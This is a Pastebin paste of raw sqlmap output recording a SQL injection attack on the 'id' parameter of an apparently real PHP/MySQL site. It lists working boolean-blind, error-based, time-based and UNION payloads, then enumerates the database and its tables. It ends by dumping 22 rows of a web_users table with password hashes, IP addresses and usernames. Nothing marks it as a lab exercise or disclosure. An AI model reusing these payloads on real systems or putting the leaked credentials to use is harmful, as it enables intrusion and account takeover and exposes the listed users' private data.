Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
- Type: UNION query
- Title: Generic UNION query (NULL) - 14 columns
- Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
- ---
- web server operating system: Linux CentOS 6.8
- web application technology: PHP 7.0.10, Apache 2.2.15
- back-end DBMS: MySQL >= 5.0
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
- Type: UNION query
- Title: Generic UNION query (NULL) - 14 columns
- Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
- ---
- web server operating system: Linux CentOS 6.8
- web application technology: PHP 7.0.10, Apache 2.2.15
- back-end DBMS: MySQL >= 5.0
- available databases [2]:
- [*] information_schema
- [*] visagik_db16_usa
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
- Type: UNION query
- Title: Generic UNION query (NULL) - 14 columns
- Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
- ---
- web server operating system: Linux CentOS 6.8
- web application technology: PHP 7.0.10, Apache 2.2.15
- back-end DBMS: MySQL >= 5.0
- Database: visagik_db16_usa
- [31 tables]
- +-------------------+
- | UserQueryLog |
- | feedback_calls |
- | rec_content |
- | rec_establishment |
- | rec_permissions |
- | rec_person |
- | rec_person_temp |
- | rec_postpone |
- | rec_question |
- | rec_question_com |
- | rec_question_sub |
- | rec_rules |
- | rec_text |
- | rec_time_grid |
- | rec_window |
- | tab_content |
- | tab_tablo |
- | tab_text |
- | web_bl |
- | web_content |
- | web_countries |
- | web_google |
- | web_lang |
- | web_log |
- | web_menu_type |
- | web_news |
- | web_pincode |
- | web_text |
- | web_users |
- | web_who |
- | web_wl |
- +-------------------+
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
- Type: UNION query
- Title: Generic UNION query (NULL) - 14 columns
- Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
- ---
- web server operating system: Linux CentOS 6.8
- web application technology: PHP 7.0.10, Apache 2.2.15
- back-end DBMS: MySQL >= 5.0
- Database: visagik_db16_usa
- Table: web_users
- [11 columns]
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | block_time | datetime |
- | bp | tinyint(4) |
- | fullname | varchar(50) |
- | ID | mediumint(9) |
- | ip | varchar(15) |
- | lastip | varchar(15) |
- | lastlogin | datetime |
- | password | varchar(100) |
- | permision | tinyint(4) |
- | status | tinyint(4) |
- | username | varchar(60) |
- +------------+--------------+
- sqlmap resumed the following injection point(s) from stored session:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=contact2' AND 2929=2929 AND 'rJFk'='rJFk
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
- Payload: id=contact2' AND (SELECT 1782 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(1782=1782,1))),0x716b716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hsgG'='hsgG
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 AND time-based blind
- Payload: id=contact2' AND SLEEP(5) AND 'JXHR'='JXHR
- Type: UNION query
- Title: Generic UNION query (NULL) - 14 columns
- Payload: id=-8644' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a717071,0x796963626447614c68646762736443627472716570686d5a65774d49584b5377456b524d4d614562,0x716b716a71),NULL,NULL,NULL,NULL-- dJKg
- ---
- web server operating system: Linux CentOS 6.8
- web application technology: PHP 7.0.10, Apache 2.2.15
- back-end DBMS: MySQL >= 5.0
- Database: visagik_db16_usa
- Table: web_users
- [22 entries]
- +----------------------------------+-----------------+----+-------------------+
- | password | ip | ID | username |
- +----------------------------------+-----------------+----+-------------------+
- | 4f91a192c48c484a50d4fd88d5eb489b | 62.141.88.108 | 1 | Dmitry |
- | 434c68728c1839fd38c02bd947d91d5d | 62.141.88.108 | 2 | Pavel |
- | 1bac08d672c82a1915ac2cb0a8d9ffe2 | <blank> | 22 | Nikolay |
- | c77cd64a279c7de762e4cd881c7b3957 | 50.254.120.117 | 4 | moderator_hs |
- | c77cd64a279c7de762e4cd881c7b3957 | 64.128.167.178 | 5 | moderator_ny |
- | c77cd64a279c7de762e4cd881c7b3957 | 66.235.33.42 | 6 | moderator_se |
- | c77cd64a279c7de762e4cd881c7b3957 | 104.184.155.153 | 7 | moderator_sf |
- | c77cd64a279c7de762e4cd881c7b3957 | 96.88.232.237 | 8 | moderator_wa |
- | 42ae7ee7cee7b215d85ee4d84376adae | <blank> | 9 | consul_wa |
- | b5520230f586a3e3aa0a175ec37ffb12 | 62.141.88.108 | 11 | Vorontsova |
- | fea800e827a96e55ba02cf3436e65c54 | 50.254.120.117 | 12 | operator_hs |
- | e2a906ee7656cedcc7f0d2c059fbfd5a | 64.128.167.178 | 13 | operator_ny |
- | 5263d4292504fbfe00f2e701296b3261 | 66.235.33.42 | 14 | operator_se |
- | cf1bba38274da6910cca5796d29445c1 | 104.184.155.153 | 15 | operator_sf |
- | 1fb621fdb40464d47af3600dd9974556 | 96.88.232.237 | 16 | operator_wa |
- | 9c63533f13e01c6551fd80408fa48b39 | <blank> | 17 | kzu_washington |
- | 006232654f333fd71aec9769eea0fb49 | <blank> | 18 | kzu_new_york |
- | 5e430651e50adf0c0538b433c391f5e9 | <blank> | 19 | kzu_houston |
- | 9439cdce408287f42ae6dc64b2fad909 | <blank> | 20 | kzu_seattle |
- | d8dc8bee84f2965895eee76db960c9d6 | <blank> | 21 | kzu_san_francisco |
- | 9650ed717b9e85bf93fd13f2c2f2271b | <blank> | 23 | Content |
- | 15d13927dd8d3f8be287d2715a9c7def | <blank> | 24 | Nikolai |
- +----------------------------------+-----------------+----+-------------------+
Add Comment
Please, Sign In to add comment